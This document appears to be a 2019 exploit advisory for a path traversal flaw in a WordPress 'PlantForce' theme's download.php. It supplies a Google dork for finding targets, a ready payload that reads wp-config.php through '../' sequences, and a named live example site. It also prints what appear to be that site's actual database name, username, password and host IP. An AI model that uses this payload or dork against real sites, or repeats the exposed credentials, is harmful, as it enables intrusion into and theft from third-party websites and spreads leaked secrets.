WordPress 4.7.1 PlantForce Themes Arbitrary File Download

1. ############################################################################################
2.  
3. # Exploit Title : WordPress 4.7.1 PlantForce Themes Arbitrary File Download
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 18/03/2019
7. # Vendor Homepage : plant-force.co.uk - wordpress.org
8. # Software Information Link : plant-force.co.uk/plantforce-hs-policy/
9. # Software Version : 4.7.1
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Exploit Risk : Medium
13. # Google Dorks : inurl:"/wp-content/themes/plantforce/"
14. intext:Copyright © Plantforce Interior Landscaping Ltd 2019
15. # Vulnerability Type :
16. CWE-200 [ Information Exposure ]
17. CWE-23 [ Relative Path Traversal ]
18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
21.  
22. ############################################################################################
23.  
24. # Impact :
25. ***********
26. * WordPress 4.7.1 PlantForce Themes is prone to a vulnerability that lets attackers download arbitrary files because the application
27.  
28. fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the
29.  
30. web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure
31.  
32. of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal
33.  
34. vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not
35.  
36. properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
37.  
38. ############################################################################################
39.  
40. # Vulnerable File :
41. *****************
42. /download.php
43.  
44. # Vulnerable Parameter :
45. **********************
46. ?download_file=
47.  
48. # Arbitrary File Download Exploit :
49. *******************************
50. /wp-content/themes/plantforce/download.php?download_file=[FILENAME]
51.  
52. /wp-content/themes/plantforce/download.php?download_file=../../../wp-config.php
53.  
54. # Information about MySQL Configuration File :
55. ******************************************
56. ** MySQL settings - You can get this info from your web host ** //
57. /
58. ** The name of the database for WordPress */
59. define('DB_NAME', '');
60.  
61. /
62. ** MySQL database username */
63. define('DB_USER', '');
64.  
65. /
66. ** MySQL database password */
67. define('DB_PASSWORD', '');
68.  
69. /
70. ** MySQL hostname */
71. define('DB_HOST', '');
72.  
73. /
74.  
75. ############################################################################################
76.  
77. # Example Vulnerable Site :
78. ***********************
79. [+] plant-force.co.uk/wp-content/themes/plantforce/download.php?download_file=../../../wp-config.php
80.  
81. ** MySQL settings - You can get this info from your web host ** //
82. /
83. ** The name of the database for WordPress */
84. define('DB_NAME', 'plantforce');
85.  
86. /
87. ** MySQL database username */
88. define('DB_USER', 'plantforce');
89.  
90. /
91. ** MySQL database password */
92. define('DB_PASSWORD', 'pa55word123$');
93.  
94. /
95. ** MySQL hostname */
96. define('DB_HOST', '213.171.200.75');
97.  
98. /
99.  
100. ############################################################################################
101.  
102. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
103.  
104. ############################################################################################